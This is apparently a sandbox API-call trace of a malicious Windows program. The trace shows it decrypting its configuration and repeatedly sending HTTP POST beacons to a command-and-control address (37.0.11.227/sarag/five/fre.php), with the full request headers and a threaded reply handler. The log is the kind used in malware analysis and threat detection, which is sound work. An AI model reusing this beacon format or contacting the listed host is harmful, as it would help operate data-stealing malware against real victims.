[0265.165] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0265.171] GetProcessHeap () returned 0x690000 [0265.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0265.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.173] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0265.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.174] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.176] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.176] GetProcessHeap () returned 0x690000 [0265.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0265.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.178] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0265.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.179] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0265.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.179] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0265.180] GetProcessHeap () returned 0x690000 [0265.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0265.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.180] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.181] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.182] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.185] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.185] GetProcessHeap () returned 0x690000 [0265.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0265.185] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.185] GetProcessHeap () returned 0x690000 [0265.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0265.186] GetProcessHeap () returned 0x690000 [0265.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0265.186] GetProcessHeap () returned 0x690000 [0265.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0265.186] GetProcessHeap () returned 0x690000 [0265.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0265.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.188] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0265.201] GetProcessHeap () returned 0x690000 [0265.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0265.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.202] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0265.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.203] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.204] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.204] GetProcessHeap () returned 0x690000 [0265.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0265.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.205] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0265.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.206] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0265.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.207] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0265.207] GetProcessHeap () returned 0x690000 [0265.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0265.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.208] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0265.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.208] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0265.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.209] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0265.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.210] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0265.210] GetProcessHeap () returned 0x690000 [0265.210] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0265.210] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0265.210] GetProcessHeap () returned 0x690000 [0265.210] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0265.210] socket (af=2, type=1, protocol=6) returned 0x7c0 [0265.211] connect (s=0x7c0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0265.232] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0265.232] GetProcessHeap () returned 0x690000 [0265.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0265.232] GetProcessHeap () returned 0x690000 [0265.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0265.233] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.234] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.234] GetProcessHeap () returned 0x690000 [0265.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0265.234] GetProcessHeap () returned 0x690000 [0265.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.234] GetProcessHeap () returned 0x690000 [0265.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0265.234] GetProcessHeap () returned 0x690000 [0265.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0265.235] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.236] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.236] GetProcessHeap () returned 0x690000 [0265.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0265.236] GetProcessHeap () returned 0x690000 [0265.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.236] send (s=0x7c0, buf=0x6ad508*, len=242, flags=0) returned 242 [0265.237] send (s=0x7c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0265.237] GetProcessHeap () returned 0x690000 [0265.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0265.237] recv (in: s=0x7c0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0265.319] GetProcessHeap () returned 0x690000 [0265.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0265.320] GetProcessHeap () returned 0x690000 [0265.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0265.321] GetProcessHeap () returned 0x690000 [0265.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0265.321] GetProcessHeap () returned 0x690000 [0265.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0265.322] closesocket (s=0x7c0) returned 0 [0265.322] GetProcessHeap () returned 0x690000 [0265.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0265.322] GetProcessHeap () returned 0x690000 [0265.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0265.323] GetProcessHeap () returned 0x690000 [0265.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0265.323] GetProcessHeap () returned 0x690000 [0265.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0265.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1574) returned 0x7c0 [0265.329] Sleep (dwMilliseconds=0xea60) [0265.330] GetProcessHeap () returned 0x690000 [0265.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0265.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.332] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.340] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0265.346] GetProcessHeap () returned 0x690000 [0265.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0265.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.347] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0265.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.349] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.350] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.350] GetProcessHeap () returned 0x690000 [0265.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0265.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.351] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0265.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.352] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0265.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.353] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0265.353] GetProcessHeap () returned 0x690000 [0265.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0265.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.354] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.355] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.356] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.357] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.357] GetProcessHeap () returned 0x690000 [0265.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0265.357] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.357] GetProcessHeap () returned 0x690000 [0265.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0265.357] GetProcessHeap () returned 0x690000 [0265.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0265.361] GetProcessHeap () returned 0x690000 [0265.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0265.362] GetProcessHeap () returned 0x690000 [0265.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0265.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.363] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.368] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0265.386] GetProcessHeap () returned 0x690000 [0265.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0265.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.387] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0265.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.388] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.389] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.389] GetProcessHeap () returned 0x690000 [0265.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0265.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.390] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0265.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.406] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0265.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.408] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0265.408] GetProcessHeap () returned 0x690000 [0265.408] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0265.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.409] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0265.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.411] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0265.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.411] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0265.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.412] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0265.413] GetProcessHeap () returned 0x690000 [0265.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0265.413] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0265.413] GetProcessHeap () returned 0x690000 [0265.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0265.413] socket (af=2, type=1, protocol=6) returned 0x7c4 [0265.413] connect (s=0x7c4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0265.440] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0265.440] GetProcessHeap () returned 0x690000 [0265.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0265.440] GetProcessHeap () returned 0x690000 [0265.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0265.441] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.442] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.442] GetProcessHeap () returned 0x690000 [0265.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0265.442] GetProcessHeap () returned 0x690000 [0265.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.443] GetProcessHeap () returned 0x690000 [0265.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0265.443] GetProcessHeap () returned 0x690000 [0265.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0265.444] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.445] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.445] GetProcessHeap () returned 0x690000 [0265.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0265.445] GetProcessHeap () returned 0x690000 [0265.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.445] send (s=0x7c4, buf=0x6ad508*, len=242, flags=0) returned 242 [0265.446] send (s=0x7c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0265.446] GetProcessHeap () returned 0x690000 [0265.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0265.446] recv (in: s=0x7c4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0265.532] GetProcessHeap () returned 0x690000 [0265.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0265.532] GetProcessHeap () returned 0x690000 [0265.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0265.533] GetProcessHeap () returned 0x690000 [0265.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0265.533] GetProcessHeap () returned 0x690000 [0265.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0265.533] closesocket (s=0x7c4) returned 0 [0265.534] GetProcessHeap () returned 0x690000 [0265.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0265.534] GetProcessHeap () returned 0x690000 [0265.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0265.534] GetProcessHeap () returned 0x690000 [0265.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0265.535] GetProcessHeap () returned 0x690000 [0265.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0265.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1578) returned 0x7c4 [0265.537] Sleep (dwMilliseconds=0xea60) [0265.541] GetProcessHeap () returned 0x690000 [0265.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0265.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.553] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0265.562] GetProcessHeap () returned 0x690000 [0265.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0265.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.563] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0265.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.564] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.565] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.565] GetProcessHeap () returned 0x690000 [0265.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0265.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.567] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, 